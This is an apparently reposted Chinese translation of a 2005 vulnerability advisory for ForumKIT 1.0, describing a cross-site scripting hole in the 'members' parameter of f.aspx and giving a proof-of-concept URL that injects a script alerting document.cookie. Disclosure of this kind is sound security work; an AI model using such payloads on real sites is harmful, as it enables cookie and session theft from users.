[翻译]ForumKIT跨站脚本漏洞
本文作者: 剑心[B.C.T]翻译网站: [url]http://www.bnso.net[/url]
发布日期:2005.1.14
漏洞来源:tom cruise <the.n3t(at)gmail.com>
漏洞系统:
forumKIT 1.0
漏洞描述:
在members变量中存在一个跨站脚本漏洞,你可以替换true的值为跨站攻击代码。
利用示范:
[url]http://forum.target.com/f.aspx?members=[/url]">
<script>alert(document.cookie);</script>
漏洞发现:neO
联系地址:al_modamer@hotmail.com
页:
[1]